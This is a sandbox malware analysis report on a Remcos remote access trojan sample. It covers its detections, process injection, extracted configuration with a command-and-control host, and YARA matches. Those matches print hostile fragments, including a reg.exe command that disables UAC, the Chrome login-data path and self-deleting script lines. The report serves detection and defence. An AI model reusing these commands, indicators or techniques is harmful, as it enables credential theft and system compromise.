Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:882711
MD5:66108176e22e6f9513a62c76f2185468
SHA1:a05e217104b39485fbb4ce3cda9cb65b20960ccb
SHA256:e1eb3fe18ad660415f59eaac2c768afa1b20e07f107dfc207da8b0880a888aaf
Tags:NETexeMSILRemcosRATx64
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected UAC Bypass using CMSTP
Contains functionality to bypass UAC (CMSTPLUA)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Sigma detected: Remcos
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Writes to foreign memory regions
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Machine Learning detection for sample
Allocates memory in foreign processes
Contains functionality to modify clipboard data
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Contains functionality to steal Chrome passwords or cookies
C2 URLs / IPs found in malware configuration
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to read the PEB
Contains functionality to download and launch executables
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6804 cmdline: C:\Users\user\Desktop\file.exe MD5: 66108176E22E6F9513A62C76F2185468)
    • aspnet_compiler.exe (PID: 6588 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "pekonomia.duckdns.org:30861:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-B0VP4N", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
      • 0x6ed58:$a1: Remcos restarted by watchdog!
      • 0x6f2bc:$a3: %02i:%02i:%02i:%03i
      00000002.00000002.813061315.00000000013F7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          Click to see the 13 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.file.exe.18f92636a68.1.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            1.2.file.exe.18f92636a68.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              1.2.file.exe.18f92636a68.1.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x623b8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x6234c:$s1: CoGetObject
              • 0x62360:$s1: CoGetObject
              • 0x6237c:$s1: CoGetObject
              • 0x6c15e:$s1: CoGetObject
              • 0x6230c:$s2: Elevation:Administrator!new:
              1.2.file.exe.18f92636a68.1.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x68470:$a1: Remcos restarted by watchdog!
              • 0x689d4:$a3: %02i:%02i:%02i:%03i
              1.2.file.exe.18f92636a68.1.unpackREMCOS_RAT_variantsunknownunknown
              • 0x624c4:$str_a1: C:\Windows\System32\cmd.exe
              • 0x62440:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x62440:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x62938:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x63168:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x62534:$str_b2: Executing file:
              • 0x635b4:$str_b3: GetDirectListeningPort
              • 0x62f58:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x630d8:$str_b7: \update.vbs
              • 0x6255c:$str_b9: Downloaded file:
              • 0x62548:$str_b10: Downloading file:
              • 0x625ec:$str_b12: Failed to upload file:
              • 0x6357c:$str_b13: StartForward
              • 0x6359c:$str_b14: StopForward
              • 0x63030:$str_b15: fso.DeleteFile "
              • 0x62fc4:$str_b16: On Error Resume Next
              • 0x63060:$str_b17: fso.DeleteFolder "
              • 0x625dc:$str_b18: Uploaded file:
              • 0x6259c:$str_b19: Unable to delete:
              • 0x62ff8:$str_b20: while fso.FileExists("
              • 0x62a71:$str_c0: [Firefox StoredLogins not found]
              Click to see the 14 entries

              Sigma Signatures

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: Registry Key setAuthor: Joe Security: Data: Details: C5 5F 2B 55 33 A4 98 37 6E 69 93 D0 FA C8 DF 1D 85 5A D2 A3 F4 69 F6 E6 9F 19 FD F0 A7 EC 01 F5 46 63 8F BB B9 69 85 00 DF F9 DF 1C 35 87 19 0C 66 74 E5 C1 40 C8 B2 56 52 3A 39 AF 6E 7B A2 4B C2 F9 6C 0B 27 18 35 EF DA 6D 77 A7 1C D9 6A C4 7E 5E C3 0D 05 AF AE 03 2A 5D 9D 85 53 DA 1C 55 9B 15 A7 B6 55 99 F2 C6 6A EF 6C 66 0F F0 CB 98 42 F9 5B 20 60 89 F5 83 86 03 C5 66 7C 2A FB E5 39 FA 4B 6E , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 6588, TargetObject: HKEY_CURRENT_USER\Software\Rmc-B0VP4N\exepath

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000002.00000002.813061315.00000000013F7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "pekonomia.duckdns.org:30861:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-B0VP4N", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 24%
              Source: file.exeVirustotal: Detection: 32%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.file.exe.18f92636a68.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.813061315.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6804, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6588, type: MEMORYSTR
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: pekonomia.duckdns.orgAvira URL Cloud: Label: malware
              Multi AV Scanner detection for domain / URL
              Source: pekonomia.duckdns.orgVirustotal: Detection: 6%Perma Link
              Source: pekonomia.duckdns.orgVirustotal: Detection: 6%Perma Link
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00432142 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,2_2_00432142
              Source: file.exe, 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----

              Exploits

              barindex
              Yara detected UAC Bypass using CMSTP
              Source: Yara matchFile source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.file.exe.18f92636a68.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6804, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6588, type: MEMORYSTR

              Privilege Escalation

              barindex
              Contains functionality to bypass UAC (CMSTPLUA)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00406B71 _wcslen,CoGetObject,2_2_00406B71
              Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: CEMENT.pdb source: file.exe, 00000001.00000002.555430907.0000018FF8E60000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000001.00000002.550087026.0000018F8008D000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: NBB872.pdb source: file.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0044D0F9 FindFirstFileExA,2_2_0044D0F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040B0AA FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_0040B0AA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040B2B1 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_0040B2B1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00418650 FindFirstFileW,FindNextFileW,FindNextFileW,2_2_00418650
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040B8C7 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,2_2_0040B8C7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00408909 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00408909
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041AC0A FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_0041AC0A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00408D1B __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00408D1B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00407E80 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,2_2_00407E80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00406EB0 FindFirstFileW,FindNextFileW,2_2_00406EB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040730B SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,2_2_0040730B

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: pekonomia.duckdns.org
              Uses dynamic DNS services
              Source: unknownDNS query: name: pekonomia.duckdns.org
              Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
              Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
              Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
              Source: aspnet_compiler.exeString found in binary or memory: http://geoplugin.net/json.gp
              Source: file.exe, 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: unknownDNS traffic detected: queries for: pekonomia.duckdns.org
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004255BC recv,2_2_004255BC

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to modify clipboard data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00415802 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00415802
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00415802 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00415802
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004099E3 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,2_2_004099E3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00415802 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_00415802

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.file.exe.18f92636a68.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.813061315.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6804, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6588, type: MEMORYSTR

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 1.2.file.exe.18f92636a68.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 1.2.file.exe.18f92636a68.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: file.exe PID: 6804, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: aspnet_compiler.exe PID: 6588, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 1.2.file.exe.18f92636a68.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 1.2.file.exe.18f92636a68.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: file.exe PID: 6804, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: aspnet_compiler.exe PID: 6588, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004370402_2_00437040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004361CE2_2_004361CE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004131DA2_2_004131DA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0044C2492_2_0044C249
